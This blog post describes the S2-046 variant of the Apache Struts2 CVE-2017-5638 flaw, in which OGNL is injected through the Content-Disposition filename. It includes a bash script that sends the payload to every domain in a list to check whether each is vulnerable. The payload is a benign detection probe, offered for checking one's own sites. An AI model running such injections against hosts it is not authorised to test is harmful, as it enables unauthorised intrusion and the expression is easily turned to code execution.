Skip to content

New attack vector in CVE2017-5638

Yesterday HP research (Link) posted some interesting stuff regarding a new way to exploit vulnerable Struts2 (CVE2017-5638) by injecting malicious payload into filename of Content-Disposition header. This type of payload can be used to avoid rules deployed to catch payloads in Content-Type header.

Again, mitigation is pretty much the same – just upgrade your Struts. Here’s dirty code to check if any of your domains is vulnerable to this.

#Usage: s2_046_poc.sh $domain_text_file. Results are exported to vulnerable_list.csv file.
#By Nick Babkin, [email protected] incl. research works from frohoff and pwntester


#!/bin/bash

boundary="x50"
content_type="multipart/form-data; boundary=$boundary"
payload="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-NewConcept-Struts',3000*3102)}"
while IFS=  read -r line; do
	echo "Checking ..." $line
	a=$((printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl -v --connect-timeout 2 http://$line -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- [email protected]) 2>&1)
        b=$((printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl -vk --connect-timeout 2 https://$line -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- [email protected]) 2>&1)
        c=$((printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl -v --connect-timeout 2 http://www.$line -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- [email protected]) 2>&1)
        d=$((printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl -vk --connect-timeout 2 https://www.$line -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- [email protected]) 2>&1)


if [[ $a = *"9306000"* || $b = *"9306000"* || $c = *"9306000"* || $d = *"9306000"* ]]; then
        echo "$line is vulnerable!"
	echo "$line is vulnerable!" >> vulnerable_list.csv
else
	echo "$line is not vulnerable :)"
	echo "$line is not vulnerable :)" >> vulnerable_list.csv
fi
done < "${1}"

Published inCoding

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

by Nick Babkin, (c) 2016-2017